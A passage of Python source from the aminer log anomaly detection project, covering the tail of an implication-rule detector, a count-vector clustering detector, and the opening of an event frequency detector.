implication.compute_hypothesis_stability() == 1: # Update p and min_eval_true according to the results in the sample. p = implication.hypothesis_evaluated_true / implication.hypothesis_observations implication.min_eval_true = self.get_min_eval_true(self.max_observations, p, self.alpha) # Add hypothesis to rules. if implication.trigger_event in self.back_rules: self.back_rules[implication.trigger_event].append(implication) self.log_back_rules_learned += 1 self.log_new_back_rules.append(implication) else: self.back_rules[implication.trigger_event] = [implication] self.log_back_rules_learned += 1 self.log_new_back_rules.append(implication) if implication.implied_event in self.back_rules_inv: self.back_rules_inv[implication.implied_event].append(implication) else: self.back_rules_inv[implication.implied_event] = [implication] # Drop time stamps of previous observations, start new observations for rule. implication.hypothesis_trigger_timestamps.clear() self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 # Remove implication from list of hypotheses. delete_hypotheses.append(implication) self.back_hypotheses_inv[implication.implied_event].remove(implication) else: implication.add_hypothesis_observation(0, log_atom.atom_time) if implication.compute_hypothesis_stability() == -1: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 delete_hypotheses.append(implication) self.back_hypotheses_inv[implication.implied_event].remove(implication) if len(self.back_hypotheses_inv[implication.implied_event]) == 0: del self.back_hypotheses_inv[implication.implied_event] for delete_hypothesis in delete_hypotheses: self.back_hypotheses[log_event].remove(delete_hypothesis) if len(self.back_hypotheses[log_event]) == 0: del self.back_hypotheses[log_event] # Clean up triggered/resolved implications. while len(self.back_hypotheses_queue) > 0: implication = self.back_hypotheses_queue[0] if len(implication.hypothesis_trigger_timestamps) == 0: self.back_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] == 'obs': implication.hypothesis_trigger_timestamps.popleft() self.back_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: implication.hypothesis_trigger_timestamps.popleft() self.back_hypotheses_queue.popleft() continue break # Generate new hypotheses if len(self.hypothesis_candidates) > 0 and random.uniform(0.0, 1.0) < self.generation_factor: implication_direction = random.randint(0, 1) if self.sum_unstable_unknown_hypotheses >= self.max_hypotheses: # If too many hypotheses exist, do nothing. implication_direction = -1 if implication_direction == 0: for candidate in self.hypothesis_candidates: candidate_event = candidate[0] # Chronological implication is: candidate_event <= log_event implication = Implication(log_event, candidate_event, log_atom.atom_time, self.max_observations, self.min_eval_true) if log_event in self.back_hypotheses: # Only add hypotheses that are not already present as hypotheses. continue_outer = False for imp in self.back_hypotheses[log_event]: if candidate_event == imp.implied_event: continue_outer = True break if continue_outer: continue if log_event in self.back_rules: # Only add hypotheses that are not already present as rules. continue_outer = False for imp in self.back_rules[log_event]: if candidate_event == imp.implied_event: continue_outer = True break if continue_outer: continue # At this point it is known that the implication is new, otherwise a continue statement would have been reached if log_event in self.back_hypotheses: self.back_hypotheses[log_event].append(implication) else: self.back_hypotheses[log_event] = [implication] if candidate_event in self.back_hypotheses_inv: self.back_hypotheses_inv[candidate_event].append(implication) else: self.back_hypotheses_inv[candidate_event] = [implication] self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses + 1 elif implication_direction == 1: for candidate in self.hypothesis_candidates: candidate_event = candidate[0] # Chronological implication is: candidate_event => log_event # Skip event A => event A since already covered by back hypotheses if log_event != candidate_event: implication = Implication(candidate_event, log_event, log_atom.atom_time, self.max_observations, self.min_eval_true) if candidate_event in self.forward_hypotheses: # Only add hypotheses that are not already present as hypotheses. continue_outer = False for imp in self.forward_hypotheses[candidate_event]: if log_event == imp.implied_event: continue_outer = True break if continue_outer: continue if candidate_event in self.forward_rules: # Only add hypotheses that are not already present as rules. continue_outer = False for imp in self.forward_rules[candidate_event]: if log_event == imp.implied_event: continue_outer = True break if continue_outer: continue # At this point it is known that the implication is new, otherwise a continue statement would have been reached if candidate_event in self.forward_hypotheses: self.forward_hypotheses[candidate_event].append(implication) else: self.forward_hypotheses[candidate_event] = [implication] if log_event in self.forward_hypotheses_inv: self.forward_hypotheses_inv[log_event].append(implication) else: self.forward_hypotheses_inv[log_event] = [implication] self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses + 1 if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time # Periodically remove old or unstable hypotheses. if log_atom.atom_time >= self.last_hypotheses_eval_timestamp + self.hypotheses_eval_delta_time: self.last_hypotheses_eval_timestamp = log_atom.atom_time empty_back_events = [] for event in self.back_hypotheses: outdated_hypotheses_indexes = [] i = 0 for implication in self.back_hypotheses[event]: if implication.stable == 0 and self.last_event_occurrence[ event] < log_atom.atom_time - self.delta_time_to_discard_hypothesis: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 outdated_hypotheses_indexes.append(i) self.back_hypotheses_inv[implication.implied_event].remove(implication) if len(self.back_hypotheses_inv[implication.implied_event]) == 0: del self.back_hypotheses_inv[implication.implied_event] i = i + 1 # Reverse list to avoid index changes after deletions. for outdated_hypothesis_index in reversed(outdated_hypotheses_indexes): del self.back_hypotheses[event][outdated_hypothesis_index] if len(self.back_hypotheses[event]) == 0: empty_back_events.append(event) for empty_back_event in empty_back_events: del self.back_hypotheses[empty_back_event] empty_forward_events = [] for event in self.forward_hypotheses: outdated_hypotheses_indexes = [] i = 0 for implication in self.forward_hypotheses[event]: if implication.stable == 0 and implication.most_recent_observation_timestamp < log_atom.atom_time -\ self.delta_time_to_discard_hypothesis: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 outdated_hypotheses_indexes.append(i) self.forward_hypotheses_inv[implication.implied_event].remove(implication) if len(self.forward_hypotheses_inv[implication.implied_event]) == 0: del self.forward_hypotheses_inv[implication.implied_event] i = i + 1 # Reverse list to avoid index changes after deletions. for outdated_hypothesis_index in reversed(outdated_hypotheses_indexes): del self.forward_hypotheses[event][outdated_hypothesis_index] if len(self.forward_hypotheses[event]) == 0: empty_forward_events.append(event) for empty_forward_event in empty_forward_events: del self.forward_hypotheses[empty_forward_event] # Remove old hypothesis candidates while len(self.hypothesis_candidates) > 0: candidate = self.hypothesis_candidates[0] if candidate[1] < log_atom.atom_time - self.hypothesis_max_delta_time: self.hypothesis_candidates.popleft() continue break # Add new hypothesis candidates if len(self.hypothesis_candidates) < self.candidates_size and random.uniform(0.0, 1.0) < self.generation_probability: self.hypothesis_candidates.append((log_event, log_atom.atom_time)) self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" known_path_set = set() for event_a in self.back_rules: for implication in self.back_rules[event_a]: known_path_set.add( ('back', tuple(event_a), tuple(implication.implied_event), implication.max_observations, implication.min_eval_true)) for event_a in self.forward_rules: for implication in self.forward_rules[event_a]: known_path_set.add( ('forward', tuple(event_a), tuple(implication.implied_event), implication.max_observations, implication.min_eval_true)) PersistenceUtil.store_json(self.persistence_file_name, list(known_path_set)) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new forward rules and %s new back rules in the last 60 " "minutes.", component_name, self.log_success, self.log_total, self.log_forward_rules_learned, self.log_back_rules_learned) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new forward rules and %s new back rules in the last " "60 minutes. Following new forward rules were learned: %s. Following new back rules were learned: %s", component_name, self.log_success, self.log_total, self.log_forward_rules_learned, self.log_back_rules_learned, self.log_forward_rules_learned, self.log_back_rules_learned) self.log_success = 0 self.log_total = 0 self.log_forward_rules_learned = 0 self.log_back_rules_learned = 0 self.log_new_forward_rules = [] self.log_new_back_rules = [] def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' class Implication: """Define the shape of an implication rule.""" def __init__(self, trigger_event, implied_event, generation_time, max_observations, min_eval_true): self.trigger_event = trigger_event self.implied_event = implied_event self.stable = 0 # 0 .. unknown, 1 .. stable, -1 .. unstable self.max_observations = max_observations self.min_eval_true = min_eval_true self.most_recent_observation_timestamp = generation_time self.hypothesis_trigger_timestamps = deque([]) self.rule_trigger_timestamps = deque([]) self.rule_observations = deque([]) # Hypothesis is only generated for observed implication. Thus, initialized with 1. self.hypothesis_observations = 1 self.hypothesis_evaluated_true = 1 def add_hypothesis_observation(self, result, timestamp): """Update the observation counts for a hypothesis.""" # Reset counters when max_observations is reached. self.most_recent_observation_timestamp = timestamp if self.hypothesis_observations >= self.max_observations: pass else: self.hypothesis_observations = self.hypothesis_observations + 1 self.hypothesis_evaluated_true = self.hypothesis_evaluated_true + result def compute_hypothesis_stability(self): """Compute the stability of a hypothesis.""" if self.hypothesis_evaluated_true >= self.min_eval_true: # Known that hypothesis is stable. self.stable = 1 elif (self.hypothesis_observations - self.hypothesis_evaluated_true) > (self.max_observations - self.min_eval_true): # Known that hypothesis will never be stable. self.stable = -1 else: # Stability is still unknown, more observations required. self.stable = 0 return self.stable def add_rule_observation(self, result): """Add a new rule to the observations.""" if len(self.rule_observations) >= self.max_observations: self.rule_observations.popleft() self.rule_observations.append(result) def evaluate_rule(self): """Evaluate a rule.""" ones = 0 for obs in self.rule_observations: ones = ones + obs return (len(self.rule_observations) - ones) <= (self.max_observations - self.min_eval_true) def __repr__(self): return str(self.trigger_event[-1]).split('/')[-1] + '->' + str(self.implied_event[-1]).split('/')[-1] + ', eval=' + str( self.hypothesis_evaluated_true) + '/' + str(self.hypothesis_observations) + ', rule=' + str( self.rule_observations) + ', ruletriggerts=' + str(self.rule_trigger_timestamps) def get_dictionary_repr(self): """Return the dictionary representation of an Implication.""" return {'trigger_event': self.trigger_event, 'implied_event': self.implied_event, 'stable': self.stable, 'max_observations': self.max_observations, 'min_eval_true': self.min_eval_true, 'most_recent_observation_timestamp': self.most_recent_observation_timestamp, 'hypothesis_trigger_timestamps': list(self.hypothesis_trigger_timestamps), 'rule_trigger_timestamps': list(self.rule_trigger_timestamps), 'rule_observations': list(self.rule_observations), 'hypothesis_observations': self.hypothesis_observations, 'hypothesis_evaluated_true': self.hypothesis_evaluated_true} def set_random_seed(seed): """Set the random seed for testing purposes.""" random.seed(seed) EventCountClusterDetector.py000066400000000000000000000523251437606560100364620ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for clustering event and value count vectors.. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging import math import sys from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventCountClusterDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when dissimilar event or value count vectors occur.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, window_size=600, id_path_list=None, num_windows=50, confidence_factor=0.33, idf=False, norm=False, add_normal=False, check_empty_windows=True, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param window_size the length of the time window for counting in seconds. @param id_path_list parser paths of values for which separate count vectors should be generated. @param num_windows the number of vectors stored in the models. @param confidence_factor minimum similarity threshold for detection @param idf when true, value counts are weighted higher when they occur with fewer id_paths (requires that id_path_list is set). @param norm when true, count vectors are normalized so that only relative occurrence frequencies matter for detection. @param add_normal when true, count vectors are also added to the model when they exceed the similarity threshold. @param check_empty_windows when true, empty count vectors are generated for time windows without event occurrences. @param persistence_id name of persistence document. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list", "id_path_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, id_path_list=id_path_list, window_size=window_size, num_windows=num_windows, confidence_factor=confidence_factor, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, idf=idf, norm=norm, add_normal=add_normal, check_empty_windows=check_empty_windows ) self.next_check_time = {} self.counts = {} self.known_counts = {} if self.idf and not self.id_path_list: msg = 'Omitting IDF weighting as required id_path_list is not set.' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.idf_total = set() self.idf_counts = {} self.log_windows = 0 self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Persisted data contains known count vectors, i.e., [[[, [[[,1],[,1]], [[,2],[,1]], ...]], # [,[[[,1]]]]], # 2) list of known id used for idf computation, i.e., [,], # 3) list of id observed for each value, i.e., [[,[,]],[,[]]]] persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for elem in persistence_data[0]: window_list = [] for log_ev_elem_list in elem[1]: elem_dict = {} for log_ev_elem in log_ev_elem_list: elem_dict[tuple(log_ev_elem[0])] = int(log_ev_elem[1]) window_list.append(elem_dict) self.known_counts[tuple(elem[0])] = window_list for elem in persistence_data[1]: self.idf_total.add(tuple(elem)) for elem in persistence_data[2]: id_elem_set = set() for id_elem in elem[1]: id_elem_set.add(tuple(id_elem)) self.idf_counts[tuple(elem[0])] = id_elem_set logging.getLogger(DEBUG_LOG_NAME).debug('%s loaded persistence data.', self.__class__.__name__) def receive_atom(self, log_atom): """Receive a log atom from a source.""" parser_match = log_atom.parser_match self.log_total += 1 if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return log_event = tuple(values) # In case that id_path_list is set, use it to differentiate sequences by their id. # Otherwise, the empty tuple () is used as the only key of the current_sequences dict. id_tuple = () for id_path in self.id_path_list: id_match = parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ('',) else: # Omit log atom if one of the id paths is not found. return else: matches = [] if isinstance(id_match, list): matches = id_match else: matches.append(id_match) for match in matches: if isinstance(match.match_object, bytes): id_tuple += (match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (match.match_object,) # Create entry for the id_tuple in the current_sequences dict if it did not occur before. if id_tuple not in self.known_counts: self.known_counts[id_tuple] = [] # Update statistics for idf computation if self.idf and self.id_path_list: self.idf_total.add(id_tuple) if log_event in self.idf_counts: self.idf_counts[log_event].add(id_tuple) else: self.idf_counts[log_event] = set([id_tuple]) # skipcq: PTC-W0018 if id_tuple not in self.next_check_time: # First processed log atom, initialize next check time. self.next_check_time[id_tuple] = log_atom.atom_time + self.window_size self.log_windows += 1 elif log_atom.atom_time >= self.next_check_time[id_tuple]: # Log atom exceeded next check time; time window is complete. self.next_check_time[id_tuple] = self.next_check_time[id_tuple] + self.window_size self.log_windows += 1 # Update next_check_time if a time window was skipped skipped_windows = 0 if log_atom.atom_time >= self.next_check_time[id_tuple]: skipped_windows = 1 + int((log_atom.atom_time - self.next_check_time[id_tuple]) / self.window_size) self.next_check_time[id_tuple] = self.next_check_time[id_tuple] + skipped_windows * self.window_size if self.check_empty_windows: self.detect(log_atom, id_tuple, {}) # Empty count vector self.detect(log_atom, id_tuple, self.counts[id_tuple]) # Reset counts vector self.counts[id_tuple] = {} # Increase count for observed events if id_tuple in self.counts: if log_event in self.counts[id_tuple]: self.counts[id_tuple][log_event] += 1 else: self.counts[id_tuple][log_event] = 1 else: self.counts[id_tuple] = {log_event: 1} self.log_success += 1 def add_to_model(self, id_tuple, count_vector): """Adds a count vector to the model (a fifo list of count vectors)""" if count_vector in self.known_counts[id_tuple]: # Avoid that model has identical count vectors multiple times return if len(self.known_counts[id_tuple]) >= self.num_windows: # Drop first (= oldest) count vector self.known_counts[id_tuple] = self.known_counts[id_tuple][1:] self.known_counts[id_tuple].append(count_vector) def detect(self, log_atom, id_tuple, count_vector): """Create anomaly event when anomaly score is too high.""" score = self.check(id_tuple, count_vector) if score == -1: # Sample is normal, only add to known values when add_normal is set if self.learn_mode and self.add_normal: self.add_to_model(id_tuple, count_vector) else: # Sample is anomalous, add to model when training and create event if self.learn_mode: self.add_to_model(id_tuple, count_vector) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': list(count_vector.keys()), 'AffectedLogAtomFrequencies': list(count_vector.values())} if self.id_path_list is not None: analysis_component['AffectedIdValues'] = list(id_tuple) count_info = {'ConfidenceFactor': self.confidence_factor, 'Confidence': score} event_data = {'AnalysisComponent': analysis_component, 'CountData': count_info} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Frequency anomaly detected', sorted_log_lines, event_data, log_atom, self) def check(self, id_tuple, count_vector): """Computes the manhattan metric for the count vector and each count vector present in the model.""" min_score = 1 for known_count in self.known_counts[id_tuple]: # Iterate over all count vectors in the model manh = 0 manh_max = 0 for element in set(list(known_count.keys()) + list(count_vector.keys())): # Iterate over each val that occurs in one of the vectors idf_fact = 1 if self.idf and self.id_path_list: # Compute idf (weight rare value higher than ones that occur with many id_values) idf_fact = math.log10((1 + len(self.idf_total)) / len(self.idf_counts[element])) norm_sum_known = 1 norm_sum_count = 1 if self.norm: # Normalize vectors by dividing through sum norm_sum_known = sum(known_count.values()) norm_sum_count = sum(count_vector.values()) if element not in known_count: manh += count_vector[element] * idf_fact / norm_sum_count manh_max += count_vector[element] * idf_fact / norm_sum_count elif element not in count_vector: manh += known_count[element] * idf_fact / norm_sum_known manh_max += known_count[element] * idf_fact / norm_sum_known else: manh += abs(count_vector[element] * idf_fact / norm_sum_count - known_count[element] * idf_fact / norm_sum_known) manh_max += max(count_vector[element] * idf_fact / norm_sum_count, known_count[element] * idf_fact / norm_sum_known) score = 0 if manh_max != 0: # manh_max is zero when both vectors are empty, in this case, score remains at default 0, and normalize in all other cases score = manh / manh_max if score <= self.confidence_factor: # Found similar vector; abort early to avoid spending time on more checks # Return -1 since "true" score is unknown as not all vectors in the model were checked return -1 if min_score is None: min_score = score else: min_score = min(min_score, score) return min_score def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" print(self.known_counts) known_counts_data = [] for id_tuple, vec_list in self.known_counts.items(): id_tuple_data = [] for vec_elem in vec_list: window_data = [] for log_ev, freq in vec_elem.items(): window_data.append((log_ev, freq)) id_tuple_data.append(window_data) known_counts_data.append((id_tuple, id_tuple_data)) idf_total_data = [] idf_counts_data = [] if self.idf and self.id_path_list: idf_total_data = list(self.idf_total) for log_ev, id_list in self.idf_counts.items(): idf_counts_data.append((log_ev, id_list)) persist_data = [known_counts_data, idf_total_data, idf_counts_data] PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(DEBUG_LOG_NAME).debug('%s persisted data.', self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in %d " "time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in %d " "time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows) self.log_success = 0 self.log_total = 0 self.log_windows = 0 EventFrequencyDetector.py000066400000000000000000000720461437606560100357730ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for event and value frequency deviations. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging import numpy as np from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventFrequencyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when event or value frequencies change.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, scoring_path_list=None, unique_path_list=None, window_size=600, num_windows=50, confidence_factor=0.33, empty_window_warnings=True, early_exceeding_anomaly_output=False, set_lower_limit=None, set_upper_limit=None, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param scoring_path_list parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. @param unique_path_list parser paths of values where only unique value occurrences should be counted for every value occurring in target_path_list. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param window_size the length of the time window for counting in seconds. @param num_windows the number of previous time windows considered for expected frequency estimation. @param confidence_factor defines range of tolerable deviation of measured frequency from expected frequency according to occurrences_mean +- occurrences_std / self.confidence_factor. Default value is 0.33 = 3*sigma deviation. confidence_factor must be in range [0, 1]. @param empty_window_warnings whether anomalies should be generated for too small window sizes. @param early_exceeding_anomaly_output states if an anomaly should be raised the first time the appearance count exceeds the range. @param set_lower_limit sets the lower limit of the frequency test to the specified value. @param set_upper_limit sets the upper limit of the frequency test to the specified value. @param persistence_id name of persistence document. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, scoring_path_list=scoring_path_list, unique_path_list=unique_path_list, window_size=window_size, num_windows=num_windows, confidence_factor=confidence_factor, empty_window_warnings=empty_window_warnings, early_exceeding_anomaly_output=early_exceeding_anomaly_output, set_lower_limit=set_lower_limit, set_upper_limit=set_upper_limit, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.next_check_time = None self.counts = {} self.scoring_value_list = {} self.unique_values = {} self.ranges = {} self.exceeded_range_frequency = {} self.log_windows = 0 self.last_seen_log = {} self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Persisted data contains lists of event-frequency pairs, i.e., [[, []], [, []], ...] persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for entry in persistence_data: log_event = entry[0] freqs = entry[1] # In case that num_windows differ, only 